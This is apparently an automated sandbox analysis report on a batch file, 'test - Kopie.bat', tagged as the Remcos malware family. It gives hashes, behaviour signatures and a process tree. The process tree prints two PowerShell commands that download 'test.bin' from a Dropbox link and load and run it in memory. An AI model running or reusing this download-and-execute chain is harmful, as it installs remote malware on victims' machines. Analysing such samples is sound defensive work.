Analysis
-
max time kernel
5s -
max time network
6s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
24-11-2024 11:17
Static task
static1
Behavioral task
behavioral1
Sample
test - Kopie.bat
Resource
win10ltsc2021-20241023-en
General
-
Target
test - Kopie.bat
-
Size
861B
-
MD5
f87031970e569760e8d221b726a4c679
-
SHA1
f2b149768f61329bf32221eb7dd5c99313eee085
-
SHA256
706ea002a1347263e15b09b2f67c2dc9157c0e2b339352ff4ec4430f52ffd85e
-
SHA512
3f135dd61288c3def67c0a5b3f3ba46cc9c0820c776335f437f85b81810b574ef759600dbfd6794f78624782e1fbe726e7d810f6609f0e7f206540e5c79a285f
Malware Config
Signatures
-
Remcos family
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 2960 powershell.exe 3 2960 powershell.exe -
pid Process 2960 powershell.exe 3408 powershell.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2960 powershell.exe 2960 powershell.exe 3408 powershell.exe 3408 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2960 powershell.exe Token: SeDebugPrivilege 3408 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 2400 wrote to memory of 2960 2400 cmd.exe 80 PID 2400 wrote to memory of 2960 2400 cmd.exe 80 PID 2400 wrote to memory of 3408 2400 cmd.exe 82 PID 2400 wrote to memory of 3408 2400 cmd.exe 82
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\test - Kopie.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2400 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://www.dropbox.com/scl/fi/go4g22tj0t5b12ig0ohjb/test.bin?rlkey=5lnzusf90ok1cc4vkzhnif6l4&st=xhzj7uyn&dl=1' -OutFile 'test.bin'"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2960
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "[Reflection.Assembly]::Load(File.ReadAllBytes('test.bin')).EntryPoint.Invoke(null, @())"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3408
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD55f4c933102a824f41e258078e34165a7
SHA1d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034
-
Filesize
1KB
MD5da255d6e827f6f566661652c5f08620e
SHA127a36eb35d67c0ef70bf71d5be1a989641808d65
SHA256a3b85d0066eeb4d7f0ce0c48eacbb922d6b48fd108c611f7cd05835fc0acc956
SHA5127aa629b4929885cf5c42bc1d280083dbd31ccac6425f6757cfce07dbbe4ad33a85fff1d4f8907505dc13f710d4308ee06d1fbc77e365b6b0392c8328b2fc99d0
-
Filesize
467KB
MD52cebaf36ff6bc2d6cb65fe5b05219320
SHA1804d909e328929e357fb8b4c08a7c8a851920bed
SHA256333c783deaee7a6685967a731bd8bd8d2009bb032c7e98d22df7973d350fbe7a
SHA512bf6d4e95065f337d2900f5e6d6638661bebaa79ab896ea30718f727f3326fe9cd75264fb0804e53ed4b4ad9a45f304c4b53d05c9e292caa4974d83e696b0aa96
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82